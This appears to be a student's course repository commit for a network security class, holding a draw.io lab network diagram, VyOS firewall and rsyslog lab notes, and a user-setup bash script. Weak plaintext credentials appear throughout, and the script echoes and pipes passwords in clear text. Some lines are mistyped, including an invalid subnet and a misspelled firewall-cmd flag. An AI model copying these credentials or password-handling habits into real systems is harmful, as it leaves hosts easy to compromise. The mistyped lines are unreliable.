<mxCell id="JkLcdCIDIRtKrtIc7PYW-4" value="MGMT 172.16.2000.0/28" style="rounded=1;whiteSpace=wrap;html=1;align=center;" parent="1" vertex="1">
<mxGeometry x="782" y="970" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-5" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.121;entryY=1.05;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="JkLcdCIDIRtKrtIc7PYW-6" target="WV4KZU-K2HEF4Ivt-XvY-7" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="846" y="800" as="sourcePoint" />
<mxPoint x="1034" y="830" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-17" value="&lt;div&gt;172.16.150.3&lt;/div&gt;eth0" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];fontSize=12;" parent="JkLcdCIDIRtKrtIc7PYW-5" vertex="1" connectable="0">
<mxGeometry x="-0.5172" y="-1" relative="1" as="geometry">
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-9" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;exitX=0.5;exitY=1;exitDx=0;exitDy=0;exitPerimeter=0;entryX=0.103;entryY=0.05;entryDx=0;entryDy=0;entryPerimeter=0;" parent="1" source="JkLcdCIDIRtKrtIc7PYW-6" target="JkLcdCIDIRtKrtIc7PYW-4" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="880" as="sourcePoint" />
<mxPoint x="1034" y="830" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-18" value="172.16.200.2&lt;div&gt;eth1&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];fontSize=12;" parent="JkLcdCIDIRtKrtIc7PYW-9" vertex="1" connectable="0">
<mxGeometry x="-0.2728" y="1" relative="1" as="geometry">
<mxPoint x="-1" y="8" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-11" value="wazuh&lt;div&gt;172.16.200.10&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/logos-brands-1/24/logo_brand_brands_logos_ubuntu-128.png" parent="1" vertex="1">
<mxGeometry x="782" y="1070" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-12" value="MGMT02&lt;div&gt;172.16.200.11&lt;/div&gt;" style="sketch=0;aspect=fixed;pointerEvents=1;shadow=0;dashed=0;html=1;strokeColor=none;labelPosition=center;verticalLabelPosition=bottom;verticalAlign=top;align=center;fillColor=#00188D;shape=mxgraph.mscae.enterprise.windows_server" parent="1" vertex="1">
<mxGeometry x="940" y="1070" width="39" height="50" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-15" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.5;entryY=1;entryDx=0;entryDy=0;exitX=0.308;exitY=0.12;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="JkLcdCIDIRtKrtIc7PYW-12" target="JkLcdCIDIRtKrtIc7PYW-4" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="1000" as="sourcePoint" />
<mxPoint x="1034" y="950" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-16" value="" style="endArrow=none;html=1;rounded=0;fontSize=12;startSize=8;endSize=8;curved=1;entryX=0.107;entryY=1.038;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;" parent="1" source="JkLcdCIDIRtKrtIc7PYW-11" target="JkLcdCIDIRtKrtIc7PYW-4" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="984" y="1000" as="sourcePoint" />
<mxPoint x="1034" y="950" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-4" value="&lt;div&gt;ANY &amp;gt; 172.16.50.3:80&lt;/div&gt;&lt;div&gt;172.16.150.10:22 &amp;gt; ANY:22&lt;/div&gt;" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;endSize=15.103448275862068;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=34.48275862068966;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="720" y="640" as="sourcePoint" />
<mxPoint x="540" y="640" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-7" value="ANY &gt; 172.16.200.10:1514,1515" style="shape=flexArrow;endArrow=classic;rounded=0;width=24.137931034482758;endSize=9.379310344827585;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="550" y="680" as="sourcePoint" />
<mxPoint x="740" y="680" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-12" value="ANY:80 &gt; 172.16.50.3:80" style="shape=flexArrow;endArrow=classic;rounded=0;endSize=11.33;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=28;horizontal=1;labelBackgroundColor=default;" parent="1" edge="1">
<mxGeometry x="-0.1119" y="-8" width="50" height="50" relative="1" as="geometry">
<mxPoint x="575" y="441.6" as="sourcePoint" />
<mxPoint x="489" y="561.6" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-15" value="&lt;div&gt;ANY &amp;gt; ANY&lt;/div&gt;&lt;div&gt;No restrictions&lt;br&gt;&lt;/div&gt;" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;endSize=15.019354838709678;strokeWidth=1;sourcePerimeterSpacing=0;startSize=6;width=20;" parent="1" edge="1">
<mxGeometry x="-0.2319" width="50" height="50" relative="1" as="geometry">
<mxPoint x="910" y="580" as="sourcePoint" />
<mxPoint x="883" y="450" as="targetPoint" />
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-19" value="FW01 default policy:&#xa;DROP with logging&#xa;Established connections allowed " style="rounded=0;whiteSpace=wrap;fontSize=10;verticalAlign=middle;" parent="1" vertex="1">
<mxGeometry x="700" y="480" width="151" height="70" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-20" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=0.5;entryDx=0;entryDy=0;exitX=1;exitY=0.5;exitDx=0;exitDy=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-5" target="JkLcdCIDIRtKrtIc7PYW-1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="730" y="490" as="sourcePoint" />
<mxPoint x="780" y="440" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-23" value="FW-MGMT default policy:&#xa;DROP with logging&#xa;Established connections allowed " style="rounded=0;whiteSpace=wrap;fontSize=10;verticalAlign=middle;" parent="1" vertex="1">
<mxGeometry x="631" y="790" width="151" height="70" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-25" value="" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;width=19.25925925925926;endSize=11.2;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="940" y="680" as="sourcePoint" />
<mxPoint x="950" y="846" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-26" value="&lt;div&gt;172.16.150.10:22 &amp;gt; 172.16.200.10:22&lt;br&gt;&lt;/div&gt;&lt;div&gt;172.16.150.10:443 &amp;gt; 172.16.200.10:443&lt;/div&gt;ANY &amp;gt; 172.16.200.10:1514,1515" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" parent="8yr2mNF9FMK26sW0gYA2-25" vertex="1" connectable="0">
<mxGeometry x="-0.1287" y="2" relative="1" as="geometry">
<mxPoint x="24" y="-2" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-28" value="" style="shape=flexArrow;endArrow=classic;html=1;rounded=0;width=13.793103448275863;endSize=7.63448275862069;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="920" y="950" as="sourcePoint" />
<mxPoint x="900" y="790" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-29" value="&lt;div&gt;ANY &amp;gt; 172.16.150.0/24&lt;/div&gt;&lt;div&gt;ANY &amp;gt; 172.16.50.0/29&lt;br&gt;&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" parent="8yr2mNF9FMK26sW0gYA2-28" vertex="1" connectable="0">
<mxGeometry x="-0.0417" y="-7" relative="1" as="geometry">
<mxPoint x="23" y="18" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-31" value="&lt;div&gt;&lt;br&gt;&lt;/div&gt;" style="shape=umlActor;verticalLabelPosition=bottom;verticalAlign=top;html=1;outlineConnect=0;" parent="1" vertex="1">
<mxGeometry x="1115" y="200" width="50" height="80" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-33" value="" style="endArrow=none;html=1;rounded=0;exitX=0.612;exitY=-0.033;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-7" target="JkLcdCIDIRtKrtIc7PYW-2" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="970" y="590" as="sourcePoint" />
<mxPoint x="1020" y="540" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-34" value="" style="endArrow=none;html=1;rounded=0;exitX=0.882;exitY=-0.005;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-7" target="JkLcdCIDIRtKrtIc7PYW-3" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1020" y="570" as="sourcePoint" />
<mxPoint x="1070" y="520" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-36" value="" style="endArrow=none;html=1;rounded=0;" parent="1" source="8yr2mNF9FMK26sW0gYA2-35" target="8yr2mNF9FMK26sW0gYA2-31" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1090" y="430" as="sourcePoint" />
<mxPoint x="1140" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-37" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;" parent="1" source="8yr2mNF9FMK26sW0gYA2-35" target="JkLcdCIDIRtKrtIc7PYW-3" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="1090" y="430" as="sourcePoint" />
<mxPoint x="1140" y="380" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-35" value="&lt;div&gt;Access via&lt;/div&gt;&lt;div&gt;Chrome Remote Desktop&lt;br&gt;&lt;/div&gt;" style="dashed=0;outlineConnect=0;html=1;align=center;labelPosition=center;verticalLabelPosition=bottom;verticalAlign=top;shape=mxgraph.weblogos.chrome;labelBackgroundColor=default;" parent="1" vertex="1">
<mxGeometry x="1110" y="364" width="60" height="60" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-6" value="&lt;span&gt;FW-MGMT&lt;/span&gt;" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.router;fillColor=#F58534;gradientColor=none;labelBackgroundColor=#FFFFFF;" parent="1" vertex="1">
<mxGeometry x="782" y="753" width="69" height="72" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-2" value="wks01&lt;div&gt;172.16.150.50&lt;/div&gt;" style="image;sketch=0;aspect=fixed;html=1;points=[];align=center;fontSize=12;image=img/lib/mscae/VirtualMachineWindows.svg;" parent="1" vertex="1">
<mxGeometry x="980" y="515.6" width="50" height="46" as="geometry" />
</mxCell>
<mxCell id="JkLcdCIDIRtKrtIc7PYW-3" value="mgmt01&lt;div&gt;172.16.150.10&lt;/div&gt;" style="shape=image;html=1;verticalAlign=top;verticalLabelPosition=bottom;labelBackgroundColor=#ffffff;imageAspect=0;aspect=fixed;image=https://cdn1.iconfinder.com/data/icons/operating-system-flat-1/30/ubuntu-128.png" parent="1" vertex="1">
<mxGeometry x="1080" y="502.6" width="70" height="70" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-38" value="&lt;div&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;SEC 350 -&amp;nbsp; Network Security Controls&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;&quot;&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;Network Diagram - Charlotte Croce&lt;/font&gt;&lt;font style=&quot;font-size: 16px;&quot;&gt;&lt;br&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;div&gt;&lt;font style=&quot;&quot;&gt;&lt;font style=&quot;font-size: 18px;&quot;&gt;PRIOR TO MIDTERM&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;" style="rounded=0;whiteSpace=wrap;html=1;" parent="1" vertex="1">
<mxGeometry x="654" y="130" width="356" height="100" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-44" value="" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://wazuh.com/uploads/2022/05/wazuh-logo.png;" parent="1" vertex="1">
<mxGeometry x="820.66" y="1040" width="89.68" height="30" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-46" value="WEB01&#xa;172.16.50.3" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://static-00.iconduck.com/assets.00/centos-icon-2048x2048-39pfdqnc.png;" parent="1" vertex="1">
<mxGeometry x="160" y="687.5" width="90" height="90" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-47" value="" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://www.apache.org/foundation/press/kit/feather.png;" parent="1" vertex="1">
<mxGeometry x="250" y="687.5" width="56.58" height="100" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-48" value="access via vSphere" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://raw.githubusercontent.com/pulumiverse/pulumi-esxi-native/main/docs/esxi-logo.png;clipPath=inset(3% 4.33% 5% 2%);" parent="1" vertex="1">
<mxGeometry x="320" y="215.71" width="69.82" height="68.58" as="geometry" />
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-51" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=1;entryDx=0;entryDy=0;exitX=1;exitY=0.5;exitDx=0;exitDy=0;" parent="1" source="8yr2mNF9FMK26sW0gYA2-48" target="WV4KZU-K2HEF4Ivt-XvY-25" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="490" y="330" as="sourcePoint" />
<mxPoint x="540" y="280" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="8yr2mNF9FMK26sW0gYA2-52" value="" style="endArrow=none;html=1;rounded=0;entryX=0.75;entryY=1;entryDx=0;entryDy=0;exitX=0.5;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" parent="1" source="WV4KZU-K2HEF4Ivt-XvY-18" target="WV4KZU-K2HEF4Ivt-XvY-8" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="470" y="700" as="sourcePoint" />
<mxPoint x="520" y="650" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="DTbgnu_EpuIW3-PPX9BY-1" value="Text" style="text;strokeColor=none;align=center;fillColor=none;html=1;verticalAlign=middle;whiteSpace=wrap;rounded=0;" parent="1" vertex="1">
<mxGeometry x="570" y="500" width="60" height="30" as="geometry" />
</mxCell>
<mxCell id="DTbgnu_EpuIW3-PPX9BY-2" value="&lt;div&gt;&lt;font style=&quot;font-size: 8px;&quot;&gt;DELETED IN FAVOR OF NAT DESTINATION RULE&lt;/font&gt;&lt;/div&gt;&lt;font style=&quot;font-size: 8px;&quot;&gt;route 172.16.50.0/29 via 10.0.17.151&lt;/font&gt;" style="rounded=1;whiteSpace=wrap;html=1;" parent="1" vertex="1">
<mxGeometry x="960" y="300" width="115" height="64" as="geometry" />
</mxCell>
<mxCell id="DTbgnu_EpuIW3-PPX9BY-3" value="" style="shape=image;verticalLabelPosition=bottom;labelBackgroundColor=default;verticalAlign=top;aspect=fixed;imageAspect=0;image=https://modsecurity.org/img/social-share.png;" parent="1" vertex="1">
<mxGeometry x="234.96" y="767.39" width="86.67" height="22.61" as="geometry" />
</mxCell>
<mxCell id="DTbgnu_EpuIW3-PPX9BY-4" value="" style="endArrow=classic;html=1;rounded=0;dashed=1;" parent="1" edge="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="250" y="800" as="sourcePoint" />
<mxPoint x="770" y="1080" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="1T3fPST5dwJRFvFpHEdL-1" value="" style="endArrow=classic;html=1;rounded=0;" edge="1" parent="1">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="640" y="490" as="sourcePoint" />
<mxPoint x="580" y="470" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="1T3fPST5dwJRFvFpHEdL-2" value="&lt;font style=&quot;font-size: 8px;&quot;&gt;PF :80&lt;/font&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="1T3fPST5dwJRFvFpHEdL-1">
<mxGeometry x="0.0469" y="3" relative="1" as="geometry">
<mxPoint x="2" y="-2" as="offset" />
</mxGeometry>
</mxCell>
</root>
</mxGraphModel>
</diagram>
</mxfile>

BIN
net-sec-controls-sec350/diagrams/SEC350_network-diagram-beforemidterm.drawio.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 240 KiB

121
net-sec-controls-sec350/labs/week01/lab1.1-routing-and-dmz.md Normal file
View file

@ -0,0 +1,121 @@
# Lab 1.1, Routing and DMZ
## Configuring rw01
- changing the champuser password: `password123!`
- set hostname to `rw01-charlotte`([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#set-hostname))
- add sudo user `charlotte:password123!` ([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#creating-privileged-user))
- Make sure you have a static ip that matches the one in the IP assignments spreadsheet: use **nmtui**, set IP to `10.0.17.51/24` and gateway/DNS to `10.0.17.2` \
![image](../../../assets/46252357-1387-45bd-a4ae-ede9e12417c9.png)
## fw01, gateway/router/firewall ([VyOS doc](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/vyos.md))
![image](../../../assets/723c16dc-f130-4f61-9508-b0fe70adbca5.png) \
default creds: `vyoz:Ch@mpla1n!22`
### set hostname
```
configure
set system host-name fw01-charlotte
commit
save
```
Repeat exit until you get to a login prompt. Then you should see your new hostname, so go ahead and log in back to configure.
### configure interfaces
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
![image](../../../assets/2a546cc0-a012-48b3-bfc8-3884334decfa.png)
### configure gateway & DNS
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
### Configuring NAT and DNS Forwarding for DMZ
```
configure
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
set service dns forwarding system
commit
save
```
![image](../../../assets/2fe9dd01-e8e0-48c6-86a0-6f41fba39886.png)
## web01, web server
### basics
- Set adapter to DMZ: \
![image](../../../assets/a2abea31-7eb8-486a-b563-3962d086ab44.png) \
default creds: `root:Ch@mpl@1n!22`
- set hostname to `web01-charlotte`([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#set-hostname))
- add sudo user `charlotte:password123!` ([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#creating-privileged-user))
- `nmtui` \
![image](../../../assets/c69680f9-be75-4b5e-976b-cf6b508f6553.png) \
![image](../../../assets/06fa4ee7-ce28-40d2-8193-3f84b03b41d1.png)
### configure httpd
- install httpd ([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab08-apache.md#install-httpd))
### on rw01, testing web service
- any address in your DMZ should route via fw01s WAN interface. We do this with a static route on rw01
- anything addressed to the 172.16.50.0/29 network will go through the 10.0.17.151 router
```
sudo ip route add 172.16.50.0/29 via 10.0.17.151
sudo systemctl restart NetworkManager
traceroute 172.16.50.3
```
## log01, rsyslog server
log01 will be initially in the DMZ, later we will change this to a segmented network area
### basics
![image](../../../assets/b7112a43-e0e0-4d8c-af36-a7a925ccc1d8.png)
- set hostname to `log01-charlotte`([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#set-hostname))
- add sudo user `charlotte:password123!` ([reference](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/sysadmin-i-sys255/lab03-linux.md#creating-privileged-user))
### rsyslog setup
![image](../../../assets/4b9ac768-72f6-4ef4-92ed-5be231e63c7b.png) \
![image](../../../assets/cd26c18f-74b8-481c-bc37-8c602f7f46c7.png)
allow UDP and TCP 514 for syslog traffic
```
sudo firewall-cmd --add-port=514/tcp --permament
sudo firewall-cmd --add-port=514/udp --permament
sudo firewall-cmd --reload
```
![image](../../../assets/62b95926-6b2a-42e2-a12f-610b1a3336b8.png)
On log01, the `/etc/rsyslog.conf` file needs to be modified to receive syslog messages over ports 514 tcp and udp. Uncomment the appropriate lines (see below) and restart the rsyslog service.
![image](../../../assets/48994d9b-0f17-4626-ab9d-985d37c5e506.png) \
![image](../../../assets/b7c9efbf-0819-4381-99f7-14826220bb8a.png)
### on web01, configure log forwarding to log01
- `sudo yum install rsyslog`
- Create the following file: `/etc/rsyslog.d/sec350.conf` and restart rsyslog on web01
![image](../../../assets/143d58a5-5713-4425-b1d5-d8f9dcf63cf0.png)
- monitor incoming logs on log01: `tail -f /var/log/messages`
- create test log on web01: `logger -t test TESTFROMWEB01TOLOG01`

65
net-sec-controls-sec350/labs/week01/setup_script.sh Normal file
View file

@ -0,0 +1,65 @@
#!/bin/bash
# script to streamline basic linux setup
function sethostname(){
if [ -z "$1" ]; then # if no arg (using menu), prompt user
echo "current hostname: " $(hostname)
echo -n "new hostname (<ENTER> to skip): "
read newhostname
if [ -z ${newhostname} ]; then
return 0
fi
echo "...'hostnamectl set-hostname ${newhostname}'"
hostnamectl set-hostname ${newhostname}
else # if arg provided, set hostname to arg
hostnamectl set-hostname $1
fi
echo "current hostname: " $(hostname)
}
function addsudouser(){
if [ -z $2 ]; then
echo -n "username: "
read username
echo -n "password: "
read password
echo "...adduser ${username}"
adduser ${username}
echo "...echo ${password} | passwd ${username} --stdin"
echo ${password} | passwd ${username} --stdin
echo "...'usermod -aG sudo ${username}"
usermod -aG sudo ${username}
fi
}
# privilege check. this script has to be run as root (sudo)
user=$(whoami)
if [[ "$user" != "root" ]]; then
echo "please run as root. exiting..."
exit 0
fi
# interactive menu
while :
do
echo "PLease select an option:"
echo "[1] Set Hostname"
echo "[2] create user"
echo "[7] Quit"
echo -n "> "
read userInput
echo ""
if [[ "$userInput" == "1" ]]; then
sethostname
elif [[ "$userInput" == "2" ]]; then
addsudouser
elif [[ "$userInput" == "7" ]]; then
echo "Exiting,,."
break
fi
done

23
net-sec-controls-sec350/labs/week02/Lab2.1-standardizing-time.md Normal file
View file

@ -0,0 +1,23 @@
# Lab 2.1 Standardizing on Time
Time is not recorded consistently across all of our systems. You will note very quickly that none of your systems record the timezone within the syslog entry. Without this data it is very hard to develop a cohesive timeline for events that span multiple log sources and multiple time zones. We are going to fix this.
Though the date is set for EST, the specific log entry that may or may not be forwarded to a log server has no indication of the timezone or the year.
![image](../../../assets/9f753b28-fd3b-4854-b155-54bca96e239c.png)
## rw01 - ubuntu
We fix this by commenting out a line (shown below) in RW01's main `/etc/rsyslog.conf` file. By default, rsyslog does not use high precision timestamps. Make sure to restart rsyslog on rw01
![image](../../../assets/8ed3b550-988b-432c-895e-3f1e3acceb45.png)
![image](../../../assets/aa578b16-2113-4af0-b7c7-ae18e52ad336.png)
## web01 & log01 - rocky
in `/etc/rsyslog.conf`
- add these lines:
- `$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format`---enables RFC 5424-style syslog format, which includes high-precision timestamps with timezone information.
- `template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")`---explicitly defines a custom template, including high-fidelity timestamps with timezone info
- add the suffix `;BetterTiming` to the loggging destination---enables the custom template on your logs
![image](../../../assets/0331dde8-2028-445d-89e2-d55fb5b3cf45.png)
![image](../../../assets/742df745-1a26-4c6d-a082-d7edfa04fd2f.png)

66
net-sec-controls-sec350/labs/week02/Lab2.2-syslog-organization.md Normal file
View file

@ -0,0 +1,66 @@
# Lab 2.2 - Syslog Organization on log01
## setup mgmt01
- on LAN
- ip: 172.16.150.10
- DG & DNS: 172.16.150.2
### configure fw01 with the LAN
#### NAT rules on fw01, to set NAT for LAN to WAN
```
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
```
#### DNS forwarding from LAN to WAN
```
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
```
mgmt01 should now be able to ping google.com
### Install chrome remote desktop on mgmt01
- open chrome
- sign in with school email and turn on sync
- go to remotedesktop.google.com, install the app if you want
- on main host (laptop, go to `https://g.co/crd/headless`), download and install the package:
- there might be dependency issues, this command worked on my computer: `sudo apt install libutempter0 xbase-clients xserver-xorg-video-dummy xvfb`
- `sudo dpkg -i google-chrome-stable_current_amd64`
- still on main host, click next and copy the command for the remote OS (in our case, debian)
- paste it in the remote terminal, and create a PIN
- at this point you should be able to access mgmt01 via chrome remote desktop, you might need to update CRD on mgmt01 first though, but we know how to do that ^
- IMPORTANT: log out of the remote computer before attempting to connect
## log organization on log01
Having all of our remote logs stuffed into log01's /var/log/messages or /var/log/secure is not helpful. Remote logs should be segregated and ideally stored on reliable and redundant storage in a manner that supports dealing with discrete event types. We are going to store logs in a directory hierarchy in order to provide this organization.
- re-comment the input modules from lab 1.1
![image](../../../assets/a51c6beb-41a7-4885-a285-61885f073995.png)
- create a new config file call sec350.conf:
![image](../../../assets/c12ab0af-4ef2-4904-9ede-9d4d96a65122.png)
- copy that file to /etc/rsyslod.d/: `sudo cp sec350.conf /etc/rsyslog.d/`
```
This configuration file (03-sec350.conf) will dynamically create and name files based upon hostname,
date and process name. Input over udp 514 is associated with the RemoteDevice ruleset which in turn
uses the dynamic template configuration called “DynFile”.
```
testing \
![image](../../../assets/37f2c335-0611-42c9-962a-62a4681eeae5.png)
![image](../../../assets/3b863e99-1ae4-4d29-91cb-1a3b187aab5f.png)
## web01: Logging Authorization Events
Modify the rsyslog client configuration on web01 so that authentication events are forwarded to our log server. the line `authpriv.* @172.16.50.5` will send all authpriv logs to the remote server(log01)
![image](../../../assets/59be1bd2-d915-4360-9595-f0d32d68e030.png) \
after sshing from rw01>web01(with failed attempts), we can see this in the sshd.log file \
![image](../../../assets/f45b745c-6aff-4cd6-86dd-0ddb13256267.png)
## fw01: Logging Authorization Events
We are going to adjust the vyos configuration to send authentication messages from fw01 to log01. Note, vyos does produce a ton of useless authentication messages which we are going to have to deal with at some point.
- first, [change the default password](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/week01/vyos.md#change-password) : `set system login user vyos authentication plaintext-password password123!`
- `set system syslog host 172.16.50.5 facility authpriv level info` \
